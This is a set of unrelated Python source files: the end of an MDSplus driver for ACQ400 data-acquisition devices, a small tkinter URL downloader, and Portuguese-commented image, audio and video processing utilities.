segment = 0
running = self.dev.running
max_segments = self.dev.max_segments.data()
while running.on and segment < max_segments:
try:
buf = self.full_buffers.get(block=True, timeout=1)
except Empty:
continue
buffer = np.frombuffer(buf, dtype='int16')
i = 0
for c in self.chans:
slength = self.seg_length/self.decim[i]
deltat = dt * self.decim[i]
if c.on:
b = buffer[i::self.nchans*self.decim[i]]
begin = segment * slength * deltat
end = begin + (slength - 1) * deltat
dim = MDSplus.Range(begin, end, deltat)
c.makeSegment(begin, end, dim, b)
i += 1
segment += 1
MDSplus.Event.setevent(event_name)
self.empty_buffers.put(buf)
self.dev.trig_time.record = self.device_thread.trig_time - ((self.device_thread.io_buffer_size / np.int16(0).nbytes) * dt)
self.device_thread.stop()
class DeviceWorker(threading.Thread):
running = False
def __init__(self,mds):
threading.Thread.__init__(self)
self.debug = mds.dev.debug
self.node_addr = mds.dev.node.data()
self.seg_length = mds.dev.seg_length.data()
self.segment_bytes = mds.segment_bytes
self.freq = mds.dev.freq.data()
self.nchans = mds.nchans
self.empty_buffers = mds.empty_buffers
self.full_buffers = mds.full_buffers
self.trig_time = 0
self.io_buffer_size = 4096
def stop(self):
self.running = False
def run(self):
if self.debug:
print("DeviceWorker running")
self.running = True
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.node_addr,4210))
s.settimeout(6)
# trigger time out count initialization:
first = True
while self.running:
try:
buf = self.empty_buffers.get(block=False)
except Empty:
buf = bytearray(self.segment_bytes)
toread =self.segment_bytes
try:
view = memoryview(buf)
while toread:
nbytes = s.recv_into(view, min(self.io_buffer_size,toread))
if first:
self.trig_time = time.time()
first = False
view = view[nbytes:] # slicing views is cheap
toread -= nbytes
except socket.timeout as e:
print("Got a timeout.")
err = e.args[0]
# this next if/else is a bit redundant, but illustrates how the
# timeout exception is setup
if err == 'timed out':
time.sleep(1)
print (' recv timed out, retry later')
continue
else:
print (e)
break
except socket.error as e:
# Something else happened, handle error, exit, etc.
print("socket error", e)
self.full_buffers.put(buf[:self.segment_bytes-toread])
break
else:
if toread != 0:
print ('orderly shutdown on server end')
break
else:
self.full_buffers.put(buf)
class _ACQ400_TR_BASE(_ACQ400_BASE):
"""
A child class of _ACQ400_BASE that contains the specific methods for
taking a transient capture.
"""
def _arm(self):
uut = acq400_hapi.Acq400(self.node.data())
shot_controller = acq400_hapi.ShotController([uut])
shot_controller.run_shot()
return None
def arm(self):
thread = threading.Thread(target = self._arm)
thread.start()
ARM=arm
def store(self):
thread = threading.Thread(target = self._store)
thread.start()
return None
STORE=store
def _store(self):
uut = acq400_hapi.Acq400(self.node.data())
while uut.statmon.get_state() != 0: continue
self.chans = []
nchans = uut.nchan()
for ii in range(nchans):
self.chans.append(getattr(self, 'INPUT_%3.3d'%(ii+1)))
uut.fetch_all_calibration()
eslo = uut.cal_eslo[1:]
eoff = uut.cal_eoff[1:]
channel_data = uut.read_channels()
DT=1/float(self.FREQ.data())
nsam = len(channel_data[0])
print("self.FREQ.data() nsam:{} {} DT {}".format(nsam, self.FREQ.data(), DT))
axis = MDSplus.Data.compile('BUILD_WITH_UNITS(BUILD_RANGE($1, $2, $3), "s")', self.TOFF.data(), nsam*DT, DT)
for ic, ch in enumerate(self.chans):
if ch.on:
ch.RAW.putData(channel_data[ic]) # store raw for easy access
ch.EOFF.putData(float(eoff[ic]))
ch.ESLO.putData(float(eslo[ic]))
ch.CAL.putData(MDSplus.Data.compile('BUILD_WITH_UNITS($3*$1+$2, "V")', ch.ESLO, ch.EOFF, ch.RAW)) # does this make a COPY of ch.RAW?
# from mdsPutCh, recipe by B.Blackwell C(2007)
win = MDSplus.Data.compile('BUILD_WINDOW(0, $1, BUILD_WITH_UNITS(0, "s"))', nsam)
ch.TB.putData(MDSplus.Dimension(win, axis))
ch.CAL_INPUT.putData(MDSplus.Data.compile('BUILD_SIGNAL($1, $2, $3)', ch.CAL, ch.RAW, ch.TB))
ch.putData(ch.CAL_INPUT)
return None
def storeb(self):
''' storeb: non-blocking for use direct from TCL> '''
return self._store()
STOREB=storeb
pass
class _ACQ400_MR_BASE(_ACQ400_TR_BASE):
"""
A sub-class of _ACQ400_TR_BASE that includes functions for MR data
and the extra nodes for MR processing.
"""
mr_base_parts = [
{'path':':DT', 'type':'numeric','options':('write_shot',)},
{'path':':TB_NS', 'type':'signal', 'options':('no_write_model','write_once',)},
{'path':':DECIMS', 'type':'signal','options':('no_write_model','write_once',)},
{'path':':Fclk', 'type':'numeric','value':40000000,'options':('write_shot',)},
{'path':':trg0_src', 'type':'text', 'value':'EXT','options':('write_model',)},
{'path':':evsel0', 'type':'numeric','value':4,'options':('write_model',)},
{'path':':MR10DEC', 'type':'numeric','value':32,'options':('write_model',)},
{'path':':STL', 'type':'text', 'options':('write_model',)}
]
def _create_time_base(self, decims, dt):
tb = np.zeros(decims.shape[-1])
ttime = 0
for ix, dec in enumerate(decims):
tb[ix] = ttime
ttime += float(dec) * dt
return tb
def create_time_base(self, uut):
decims = uut.read_decims()
try:
dt = 1 / ((round(float(uut.s0.SIG_CLK_MB_FREQ.split(" ")[1]), -4)) * 1e-9)
except:
dt = 25
tb_ns = self._create_time_base(decims, dt)
self.DECIMS.putData(decims)
self.DT.putData(dt)
self.TB_NS.putData(tb_ns)
def store(self):
uut = acq400_hapi.Acq400(self.node.data())
self.chans = []
nchans = uut.nchan()
for ii in range(nchans):
self.chans.append(getattr(self, 'INPUT_%3.3d'%(ii+1)))
uut.fetch_all_calibration()
eslo = uut.cal_eslo[1:]
eoff = uut.cal_eoff[1:]
channel_data = uut.read_channels()
for ic, ch in enumerate(self.chans):
if ch.on:
ch.putData(channel_data[ic])
ch.EOFF.putData(float(eoff[ic]))
ch.ESLO.putData(float(eslo[ic]))
expr = "{} * {} + {}".format(ch, ch.ESLO, ch.EOFF)
ch.CAL_INPUT.putData(MDSplus.Data.compile(expr))
self.create_time_base(uut)
# return None
STORE=store
def arm():
# A customised ARM function for the acq2106_MR setup.
uut = acq400_hapi.Acq400(self.node.data())
shot_controller = acq400_hapi.ShotController([uut])
shot_controller.run_shot(remote_trigger=self.selects_trg_src(uut, self.trg0_src.data()))
return None
ARM = arm
def selects_trg_src(self, uut, src):
def select_trg_src():
uut.s0.SIG_SRC_TRG_0 = src
return select_trg_src
def denormalise_stl(self, stl):
# lines = args.stl.splitlines()
lines = stl.splitlines()
stl_literal_lines = []
for line in lines:
if line.startswith('#') or len(line) < 2:
# if args.verbose:
# print(line)
continue
else:
action = line.split('#')[0]
if action.startswith('+'): # support relative increments
delayp = '+'
action = action[1:]
else:
delayp = ''
delay, state = [int(x) for x in action.split(',')]
# delayk = int(delay * self.Fclk.data() / 1000000)
delayk = int(delay * 40000000 / 1000000)
delaym = delayk - delayk % self.MR10DEC.data()
state = state << self.evsel0.data()
elem = "{}{:d},{:02x}".format(delayp, delaym, state)
stl_literal_lines.append(elem)
# if args.verbose:
# print(line)
return "\n".join(stl_literal_lines)
def init(self):
# args.uuts = [ acq400_hapi.Acq2106(u, has_comms=False) for u in args.uut ]
uut = acq400_hapi.Acq2106(self.node.data())
# master = args.uuts[0]
self.STL.putData("/home/dt100/PROJECTS/acq400_hapi/user_apps/STL/acq2106_test10.stl")
with open(self.STL.data(), 'r') as fp:
stl = fp.read()
lit_stl = self.denormalise_stl(stl)
uut.s0.SIG_SRC_TRG_0 = 'NONE'
# for u in args.uuts:
# acq400_hapi.Acq400UI.exec_args(uut, args)
uut.s0.gpg_trg = '1,0,1'
uut.s0.gpg_clk = '1,1,1'
uut.s0.GPG_ENABLE = '0'
uut.load_gpg(lit_stl, 2) # TODO: Change to MDSplus debug.
uut.set_MR(True, evsel0=self.evsel0.data(), evsel1=self.evsel0.data()+1, MR10DEC=self.MR10DEC.data())
uut.s0.set_knob('SIG_EVENT_SRC_{}'.format(self.evsel0.data()), 'GPG')
uut.s0.set_knob('SIG_EVENT_SRC_{}'.format(self.evsel0.data()+1), 'GPG')
uut.s0.GPG_ENABLE = '1'
INIT = init
pass
class _ACQ400_M8_BASE(_ACQ400_BASE):
"""
A child class of _ACQ400_BASE that contains the specific methods for
taking a transient capture from MGTDRAM8.
"""
def _arm(self):
uut = acq400_hapi.Acq400(self.node.data())
print("WORKTODO")
return None
def arm(self):
thread = threading.Thread(target = self._arm)
thread.start()
ARM=arm
def _store(self):
uutname = self.node.data()
logging.basicConfig(filename="{}_M8.log".format(uutname),
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.DEBUG)
logging.debug("{}.{}".format("_ACQ400_M8_BASE", "store"))
uut = acq400_hapi.factory(uutname)
while uut.statmon.get_state() != 0:
continue
rc = uut.create_mgtdram_pull_client()
push_buffers = acq400_hapi.Acq400.intpv(uut.cA.SIG_MGT_PUSH_BUFS_COUNT)
uut.cA.SIG_MGT_PULL_BUFS_RESET = '1'
self.chans = []
nchans = uut.nchan()
for ii in range(nchans):
self.chans.append(getattr(self, 'INPUT_%3.3d'%(ii+1)))
uut.fetch_all_calibration()
eslo = uut.cal_eslo[1:]
eoff = uut.cal_eoff[1:]
M8_mirror = None
nbytes = push_buffers*acq400_hapi.Acq2106_Mgtdram8.MGT_BLOCK_BYTES
logging.debug("call get_blocks {}".format(nbytes))
for buffer in rc.get_blocks(nbytes, data_size=uut.data_size()):
if buffer is None or len(buffer) == 0:
print("Buffer len 0 quit")
break
if M8_mirror is None:
M8_mirror = buffer
else:
logging.debug("concat M8_mirror len:{}, buffer:{} ".format(len(M8_mirror), len(buffer)))
M8_mirror = np.concatenate((M8_mirror, buffer), axis=0)
logging.debug("M8_mirror len:{} * {}".format(len(M8_mirror), M8_mirror.dtype))
channel_data = M8_mirror
logging.debug("channel_data len:{} * {}".format(len(channel_data), channel_data.dtype))
logging.debug("samples per channel {}".format(len(channel_data)/nchans))
DT=1/float(self.FREQ.data())
nsam = len(channel_data)/nchans
logging.debug("self.FREQ.data() nsam:{} {} DT {}".format(nsam, self.FREQ.data(), DT))
_cmap = uut.s0.sr("channel_mapping=mgtdram")
cmap = eval('('+_cmap+')')
if len(cmap) < nchans:
logging.error("channel map length {} < nchans {}". format(len(cmap), nchans))
axis = MDSplus.Data.compile('BUILD_WITH_UNITS(BUILD_RANGE($1, $2, $3), "s")', self.TOFF.data(), nsam*DT, DT)
for ic, ch in enumerate(self.chans):
if ch.on:
ch.RAW.putData(channel_data[cmap[ic]::nchans]) # store raw for easy access
ch.EOFF.putData(float(eoff[ic]))
ch.ESLO.putData(float(eslo[ic]))
ch.CAL.putData(MDSplus.Data.compile('BUILD_WITH_UNITS($3*$1+$2, "V")', ch.ESLO, ch.EOFF, ch.RAW)) # does this make a COPY of ch.RAW?
# from mdsPutCh, recipe by B.Blackwell C(2007)
win = MDSplus.Data.compile('BUILD_WINDOW(0, $1, BUILD_WITH_UNITS(0, "s"))', nsam)
ch.TB.putData(MDSplus.Dimension(win, axis))
ch.CAL_INPUT.putData(MDSplus.Data.compile('BUILD_SIGNAL($1, $2, $3)', ch.CAL, ch.RAW, ch.TB))
ch.putData(ch.CAL_INPUT)
MDSplus.Event.setevent("{}st99".format(uutname))
logging.debug("{}.{} complete".format("_ACQ400_M8_BASE", "store"))
def store(self):
''' store: non-blocking for use with dispatcher '''
print("{}.store()".format("_ACQ400_M8_BASE"))
thread = threading.Thread(target = self._store)
thread.start()
return None
STORE=store
def storeb(self):
''' storeb: non-blocking for use direct from TCL> '''
return self._store()
STOREB=storeb
pass
def int_key_chan(elem):
return int(elem.split('_')[2])
def print_generated_classes(class_dict):
print("# public classes created in this module")
key1 = None
for key in sorted(class_dict.keys(), key=int_key_chan):
if key1 is None:
key1 = key
print("# {}".format(key))
print("{}".format(key1))
for p in class_dict[key1].parts:
print("{}".format(p))
INPFMT3 = ':INPUT_%3.3d'
#INPFMT2 = ':INPUT_%2.2d'
ACQ2106_CHANNEL_CHOICES = [8, 16, 24, 32, 40, 48, 64, 80, 96, 128, 160, 192]
ACQ1001_CHANNEL_CHOICES = [8, 16, 24, 32, 40, 48, 64]
def assemble(cls):
inpfmt = INPFMT3
# probably easier for analysis code if ALWAYS INPUT_001
# inpfmt = INPFMT2 if cls.nchan < 100 else INPFMT3
for ch in range(1, cls.nchan+1):
# expr =
node = inpfmt%(ch,)
cls.parts.append({'path': node, 'type':'signal','options':('no_write_model','write_once',)})
# 'valueExpr':'head.setChanScale(%d)' %(ch,)})
cls.parts.append({'path': node+':RAW', 'type':'signal','options':('no_write_model','write_once',)})
cls.parts.append({'path': node+':CAL', 'type':'signal'})
cls.parts.append({'path': node+':TB', 'type':'signal'})
cls.parts.append({'path': node+':DECIMATE', 'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
cls.parts.append({'path': node+':COEFFICIENT','type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
cls.parts.append({'path': node+':OFFSET', 'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
cls.parts.append({'path': node+':EOFF','type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
cls.parts.append({'path': node+':ESLO', 'type':'NUMERIC', 'value':1, 'options':('no_write_shot')})
cls.parts.append({'path': node+':CAL_INPUT', 'type':'signal'})
return cls
def create_classes(base_class, root_name, parts, channel_choices):
my_classes = {}
for nchan in channel_choices:
class_name = "{}_{}".format(root_name, str(nchan))
my_parts = list(parts)
my_classes[class_name] = assemble(
type(class_name, (base_class,), {"nchan": nchan, "parts": my_parts}))
# needed because of lockout in mdsplus code file
# python/MDSplus/tree.py function findPyDevices
my_classes[class_name].__module__ = base_class.__module__
# exec("{} = {}".format(class_name, "my_classes[class_name]"))
return my_classes
|
download_funcs.py | from threading import Thread
import urllib.request
import os
import tkinter as tk
from tkinter import messagebox
def get_content(path_var, url_entry_var):
url = url_entry_var.get()
path = path_var.get()
sep = "\\" if os.name == "nt" else "/"
error = "URL is in wrong format!"
file_name = url.strip().split("/")[-1]
if not url.startswith("http"):
messagebox.showerror(title="URL Error", message=error)
return None
if not path:
t = Thread(target=urllib.request.urlretrieve, args=(url, file_name))
else:
if os.name == "nt":
path = path.replace("\\", "\\\\")
if sep == path[-1]:
t = Thread(target=urllib.request.urlretrieve, args=(url, path + file_name))
else:
t = Thread(target=urllib.request.urlretrieve, args=(url, path + sep + file_name))
t.start()
def start_file_tasks(tasks):
for task in tasks:
task.start()
def get_content_from_file(filen_var, path_var):
tasks = []
file_name = filen_var.get()
path = path_var.get()
sep = "\\" if os.name == "nt" else "/"
max_lines = 10
if path and os.name == "nt":
path = path.replace("\\", "\\\\")
try:
with open(file_name) as content:
lines = content.readlines()
if len(lines) > max_lines:
messagebox.showerror(title="Max Lines Error", message=f"Too many lines in {file_name}! Max is {max_lines}.")
return None
for line in lines:
if not line.startswith("http"):
continue
content_name = line.strip().split("/")[-1]
if path:
if sep == path[-1]:
task = Thread(target=urllib.request.urlretrieve, args=(line, path + content_name))
else:
task = Thread(target=urllib.request.urlretrieve, args=(line, path + sep + content_name))
else:
task = Thread(target=urllib.request.urlretrieve, args=(line, content_name))
tasks.append(task)
except FileNotFoundError:
messagebox.showerror(title="File Error", message=f"File {file_name} not found!")
return None
if tasks:
start_file_tasks(tasks) |
functions.py | try:
import sys
import os,ffmpeg
from PIL import Image
from PIL import ImageEnhance
from time import sleep
from pydub import AudioSegment
import math
import numpy
from threading import Thread
import cv2
except ImportError:
print ("Error: missing one of the libraries (numpy, pyfits, scipy, matplotlib)")
sys.exit()
def get_file_size_in_bytes(file_path):
## Devolve o tamanho em bytes do ficheiro
size = os.path.getsize(file_path)
return size
# -> Defenições de compressão de Imagem
# Cria pontos iniciais para os centróides.
def initialize_K_centroids(X, K):
""" Choose K points from X at random """
m = len(X)
return X[numpy.random.choice(m, K, replace=False), :]
# Encontra o centróide mais próximo para cada exemplo de treino.
def find_closest_centroids(X, centroids):
m = len(X)
c = numpy.zeros(m)
for i in range(m):
# Find distances
distances = numpy.linalg.norm(X[i] - centroids, axis=1)
# Assign closest cluster to c[i]
c[i] = numpy.argmin(distances)
return c
# Calcula a distância de cada exemplo para o "seu" centróide e a média da sua distância para cada centróide
def compute_means(X, idx, K):
_, n = X.shape
centroids = numpy.zeros((K, n))
for k in range(K):
examples = X[numpy.where(idx == k)]
mean = [numpy.mean(column) for column in examples.T]
centroids[k] = mean
return centroids
# Aplicação do algoritmo K-means, retorna os resultados quando os centróides já não se mexerem.
def find_k_means(X, K, max_iters=10):
centroids = initialize_K_centroids(X, K)
previous_centroids = centroids
for _ in range(max_iters):
idx = find_closest_centroids(X, centroids)
centroids = compute_means(X, idx, K)
if (centroids == previous_centroids).all():
return centroids
else:
previous_centroids = centroids
return centroids, idx
# Como o algoritmo não recebe como parâmetro imagens, precisamos de converter a imagem dada num array.
def load_image(path):
## Devolve um numpy array com a imagem lida através do path
image = Image.open(path)
return numpy.asarray(image) / 255
# -> Fim das defenições de compressão de imagem
def imagemMultiplicacao(pathImagem1, pathImagem2):
# Abrir imagens
imagem1 = Image.open(pathImagem1)
imagem2 = Image.open(pathImagem2)
# Criar nova imagem onde será guardado o resultado
imagemMult = Image.new(imagem1.mode, imagem1.size, 'white')
imagemMult.save("images/ImagemMultiplicacao.jpg")
# Precorrer imagem pixel a pixel
for x in range(0, imagem1.size[0]-1):
for y in range(0, imagem1.size[1]-1):
# Para cada imagem, armazenar os dados do pixel
pixelColorsValsImagem1 = imagem1.getpixel((x,y))
pixelColorsValsImagem2 = imagem2.getpixel((x,y))
# Criar novos valores para o RGB -> Multiplicando o valor de cada R,G,B de cada uma das imagens
redPixel = pixelColorsValsImagem1[0] * pixelColorsValsImagem2[0]
if redPixel > 255 :
redPixel = 255
elif redPixel < 0:
redPixel = 0
greenPixel = pixelColorsValsImagem1[1] * pixelColorsValsImagem2[1]
if greenPixel > 255 :
greenPixel = 255
elif greenPixel < 0:
greenPixel = 0
bluePixel = pixelColorsValsImagem1[2] * pixelColorsValsImagem2[2]
if bluePixel > 255 :
bluePixel = 255
elif bluePixel < 0:
bluePixel = 0
# Colocar em cada pixel da imagem criada, o pixel com os novos valores de RGB
imagemMult.putpixel((x,y), (redPixel, greenPixel, bluePixel))
# Guardar nova imagem e mostrar aviso ao utilizador
imagemMult.save('images/ImagemMultiplicacao.jpg')
print('Multiplicação de imagens realizada com sucesso --> Verificar ImagemMultiplicação.jpg')
sleep(4)
def imagemSubtracao(pathImagem1, pathImagem2):
# Abrir imagens
imagem1 = Image.open(pathImagem1)
imagem2 = Image.open(pathImagem2)
# Criar nova imagem onde será guardado o resultado
imagemSoma = Image.new(imagem1.mode, imagem1.size, 'white')
imagemSoma.save("images/ImagemSubt.jpg")
# Precorrer imagem pixel a pixel
for x in range(0, imagem1.size[0]-1):
for y in range(0, imagem1.size[1]-1):
# Para cada imagem, armazenar os dados do pixel
pixelColorsValsImagem1 = imagem1.getpixel((x,y))
pixelColorsValsImagem2 = imagem2.getpixel((x,y))
# Criar novos valores para o RGB -> Subtraindo o valor de cada R,G,B de cada uma das imagens
redPixel = pixelColorsValsImagem1[0] - pixelColorsValsImagem2[0]
if redPixel < 0:
redPixel = 0
greenPixel = pixelColorsValsImagem1[1] - pixelColorsValsImagem2[1]
if greenPixel < 0:
redPixel = 0
bluePixel = pixelColorsValsImagem1[2] - pixelColorsValsImagem2[2]
if bluePixel < 0:
bluePixel = 0
# Colocar em cada pixel da imagem criada, o pixel com os novos valores de RGB
imagemSoma.putpixel((x,y), (redPixel, greenPixel, bluePixel))
# Guardar nova imagem e mostrar aviso ao utilizador
imagemSoma.save('images/ImagemSubt.jpg')
print('Subtração de imagens realizada com sucesso --> Verificar ImagemSubt.jpg')
sleep(4)
def imagemNegativo(pathImagem1):
# Abrir imagem
imagem1 = Image.open(pathImagem1)
# Criar a Imagem Resultado
imagem_negativo = Image.new(imagem1.mode, imagem1.size, 'white')
imagem_negativo.save("images/ImagemNegativo.jpg")
# Precorrer a imagem pixel a pixel
for x in range(0, imagem1.size[0] - 1):
for y in range(0, imagem1.size[1] - 1):
# Encontrar o valor do pixel na posição (x,y) da imagem
pixelColorVals = imagem1.getpixel((x,y))
# Inverter a Cor
redPixel = 255 - pixelColorVals[0] # Negativo do pixel vermelho
greenPixel = 255 - pixelColorVals[1] # Negativo do pixel verde
bluePixel = 255 - pixelColorVals[2] # Negativo do pixel azul
# Modificar a imagem com os pixeis invertidos
imagem_negativo.putpixel((x,y), (redPixel, greenPixel, bluePixel))
# Guardar nova imagem e mostrar aviso ao utilizador
imagem_negativo.save("images/ImagemNegativo.jpg")
print('Negativo de uma imagem realizado com sucesso --> Verificar ImagemNegativo.jpg')
sleep(4)
def imagemAND(pathImagem1, pathImagem2):
# Abrir Imagem
imagem1 = Image.open(pathImagem1)
imagem2 = Image.open(pathImagem2)
# Criar a Imagem Resultado
imagem_and = Image.new(imagem1.mode, imagem1.size, 'white')
imagem_and.save("images/ImagemAND.jpg")
for x in range(0, imagem1.size[0] - 1):
for y in range(0, imagem1.size[1] - 1):
# Encontrar o valor do pixel na posição (x,y) da imagem1 e imagem2:
pixelImg1 = imagem1.getpixel((x,y))
pixelImg2 = imagem2.getpixel((x,y))
diferencaRedPixel = pixelImg1[0] - pixelImg2[0]
diferencaGreenPixel = pixelImg1[1] - pixelImg2[1]
diferencaBluePixel = pixelImg1[2] - pixelImg2[2]
# Verifica as interseções
if diferencaRedPixel == 0 and diferencaGreenPixel == 0 and diferencaBluePixel == 0:
imagem_and.putpixel((x,y) , (pixelImg1[0], pixelImg1[1], pixelImg1[2]))
# Guardar nova imagem e mostrar aviso ao utilizador
imagem_and.save("images/ImagemAND.jpg")
print('AND de uma imagem realizado com sucesso --> Verificar ImagemAND.jpg')
sleep(4)
def imagemThreshold(pathImagem):
# Abrir imagens
imagem = Image.open(pathImagem)
# Criar nova imagem onde será guardado o resultado
imagemThreshold = Image.new(imagem.mode, imagem.size, 'white')
imagemThreshold.save("images/ImagemThreshold.jpg")
# Precorrer imagem pixel a pixel
for x in range(0, imagem.size[0]-1):
for y in range(0, imagem.size[1]-1):
# Para cada imagem, armazenar os dados do pixel
pixelColorsValsImagem = imagem.getpixel((x,y))
# Criar novos valores para o RGB -> Subtraindo o valor de cada R,G,B de cada uma das imagens
redPixel = pixelColorsValsImagem[0]
greenPixel = pixelColorsValsImagem[1]
bluePixel = pixelColorsValsImagem[2]
if redPixel > 127:
redPixel = 255
greenPixel = 255
bluePixel = 255
else:
redPixel = 0
greenPixel = 0
bluePixel = 0
# Colocar em cada pixel da imagem criada, o pixel com os novos valores de RGB
imagemThreshold.putpixel((x,y), (redPixel, greenPixel, bluePixel))
# Guardar nova imagem e mostrar aviso ao utilizador
imagemThreshold.save('images/ImagemThreshold.jpg')
print('Threshold da imagem realizado com sucesso --> Verificar ImagemThreshold.jpg')
sleep(4)
def imagemPretoBranco(pathimagem1):
# Abrir imagem
image = Image.open(pathimagem1)
# Recolher dados da imagem
img_data = image.getdata()
# Criar lista em que são colocados os pixeis da imagem lida, transformados para valores de preto e branco
lst=[]
for pixel in img_data:
lst.append(pixel[0]*0.2125+pixel[1]*0.7174+pixel[2]*0.0721)
# Criar nova imagem do mesmo tamanho da imagem lida
new_img = Image.new("L", image.size)
# Colocar na nova imagem o conteúdo da lista
new_img.putdata(lst)
# Guardar nova imagem e mostrar aviso ao utilizador
new_img.save("images/ImagemPretoBranco.jpg")
print('Preto e branco da imagem realizado com sucesso --> Verificar ImagemPretoBranco.jpg')
sleep(4)
def audioCortar(pathAudio):
# Cabeçalho da classe
class SplitWavAudio():
def __init__(self, folder, filename):
self.folder = folder
self.filename = filename
self.filepath = folder + '/' + filename
self.audio = AudioSegment.from_wav(self.filepath)
# Devolve a duração em segundos
def get_duration(self):
return self.audio.duration_seconds
# Corta o áudio num intervalo de tempo dado
def single_split(self, from_min, to_min, split_filename):
t1 = from_min * 60 * 1000
t2 = to_min * 60 * 1000
split_audio = self.audio[t1:t2]
split_audio.export(self.folder + '/' + split_filename , format = "wav")
# Corta o áudio em vários, dependendo do tempo que o utilizador queira para cada áudio cortado
def multiple_split(self, min_per_split):
total_mins = math.ceil(self.get_duration() / 60)
for i in range(0, total_mins, min_per_split):
split_fn = str(i) + '_' + self.filename
self.single_split(i, i + min_per_split, split_fn)
print(str(i) + 'Done')
if i == total_mins - min_per_split:
print('All splited successfully')
folder = 'sound'
file = pathAudio
split_wav = SplitWavAudio(folder, file)
split_wav.multiple_split(min_per_split=1)
print("Som separado com sucesso, verificar parte 0/1/2/3/4/5 do sound2.wav")
sleep(4)
# Acrescenta um áudio ao final do outro através do '+'
def audioJuntar(pathAudio1, pathAudio2):
sound1 = AudioSegment.from_wav(pathAudio1)
sound2 = AudioSegment.from_wav(pathAudio2)
combined_sounds = sound1 + sound2
combined_sounds.export("sound/soundJOUTPUT.wav", format="wav")
print("Sons somados com sucesso, verificar soundJOUTPUT.wav")
sleep(3)
def audioLowPassFilter(pathAudio):
## Lê som a partir de um path dado
song = AudioSegment.from_wav(pathAudio)
## Cria um novo som a partir do primeiro mas com as frequências a cima de 2000Hz eliminadas
new = song.low_pass_filter(2000)
## Guarda o novo som criado
new.export("sound/sound2LowPassFilter.wav", format="wav")
print("Low Pass FIlter aplicado com sucesso, verificar sound2LowPassFilter.wav")
sleep(3)
def audioAcelerar(pathAudio, speed):
## Lê som a partir de um path dado
sound = AudioSegment.from_wav(pathAudio)
## Cria um novo som acelerado "speed" vezes, sendo speed o argumento passado na função
sound_with_altered_frame_rate = sound._spawn(sound.raw_data, overrides={"frame_rate": int(sound.frame_rate * speed)})
sound_with_altered_frame_rate.set_frame_rate(sound.frame_rate)
## Guarda o novo som criado
sound_with_altered_frame_rate.export("sound/sound2Acelerado.wav", format="wav")
print("Som acelerado com sucesso, verificar sound2Acelerado.wav")
sleep(3)
def videoPretoBranco(videopath):
source = cv2.VideoCapture(videopath)
while True:
# Retira o frame
ret, frame = source.read()
# Se não tiver recebido o frame corretamente
if not ret:
print("Can't receive frame (stream end?). Exiting ...")
break
# Conversão do frame da stream para preto e branco
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Mostrar o video
cv2.imshow("Live", gray)
# Sair do ciclo
key = cv2.waitKey(1)
if key == ord("q"):
break
# Fechar a janela
cv2.destroyAllWindows()
source.release()
# Outra Função de Vídeo a Preto e branco - Não usada pois não estava a funcionar bem
class VideoToGrayscaleWidget(object):
def __init__(self, src=0):
# Cria um objeto de video captura
self.capture = cv2.VideoCapture(src)
# Resoluções padrão do frame
self.frame_width = int(self.capture.get(3))
self.frame_height = int(self.capture.get(4))
# Configuração do codec e da saída do output do video
self.codec = cv2.VideoWriter_fourcc('X','V','I','D')
self.output_video = cv2.VideoWriter('videos/videoPretoBranco.mp4', self.codec, 30, (self.frame_width, self.frame_height), isColor=False)
# Os threads começam a ler os frames da stream
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
def update(self):
# Lê o frame seguinte através de um thread diferente do anterior
while True:
if self.capture.isOpened():
(self.status, self.frame) = self.capture.read()
def show_frame(self):
# Conversão para preto e branco
if self.status:
self.gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('grayscale frame', self.gray)
# Press 'q' on keyboard to stop recording
key = cv2.waitKey(1)
if key == ord('q'):
self.capture.release()
self.output_video.release()
cv2.destroyAllWindows()
exit(1)
def save_frame(self):
# Guarda os frames já convertidos para preto e branco, para um ficheiro
self.output_video.write(self.gray)
def comprimeVideo(video_full_path, output_file_name, target_size):
## video_full_path - Path do video que pretendemos comprimir
## output_file_name - Nome com que ficará guardado o video comprimido
## O target é o tamanho do video comprimido desejado, em MB
tamanhoVideo = get_file_size_in_bytes(video_full_path)
# Reference: https://en.wikipedia.org/wiki/Bit_rate#Encoding_bit_rate
min_audio_bitrate = 32000
max_audio_bitrate = 256000
probe = ffmpeg.probe(video_full_path)
# Duração do video em segundos
duration = float(probe['format']['duration'])
# Bitrate do áudio, em bps
audio_bitrate = float(next((s for s in probe['streams'] if s['codec_type'] == 'audio'), None)['bit_rate'])
# Bitrate total do target, em bps
target_total_bitrate = (target_size * 1024 * 8) / (1.073741824 * duration)
# Bitrate do áudio do target, em bps
if 10 * audio_bitrate > target_total_bitrate:
audio_bitrate = target_total_bitrate / 10
if audio_bitrate < min_audio_bitrate < target_total_bitrate:
audio_bitrate = min_audio_bitrate
elif audio_bitrate > max_audio_bitrate:
audio_bitrate = max_audio_bitrate
# Bitrate do vídeo do target, em bps
video_bitrate = target_total_bitrate - audio_bitrate
i = ffmpeg.input(video_full_path)
## Guarda o vídeo comprimido
ffmpeg.output(i, os.devnull,**{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 1, 'f': 'mp4'}).overwrite_output().run()
ffmpeg.output(i, output_file_name,**{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 2, 'c:a': 'aac', 'b:a': audio_bitrate}).overwrite_output().run()
print("Video comprimido com sucesso, verificar videoComprimido.mp4")
## Mostra o tamanho inicial e final do video e a respetiva taxa de conversão
tamanhoVideoComp = get_file_size_in_bytes(output_file_name)
razao = tamanhoVideo/ tamanhoVideoComp
print("Tamanho do vídeo original: {0}KB\nTamanho do vídeo comprimido: {1}KB\nTaxa de compressão: {2}".format(tamanhoVideo, tamanhoVideoComp, razao))
sleep(7)
menuPrincipalOptions = {
1: 'Imagens',
2: 'Áudio',
3: 'Vídeo',
4: 'Compressão',
5: 'Sair'
}
menuImagensOptions = {
1: 'Operações Aritméticas',
2: 'Operações Lógicas',
3: 'Filtros',
4: 'Sair',
}
menuAudioOptions = {
1: 'Edição',
2: 'Filtros',
3: 'Sair',
}
menuCompressaoOptions = {
1: 'Compressão de imagem',
2: 'Compressão de vídeo',
3: 'Sair',
}
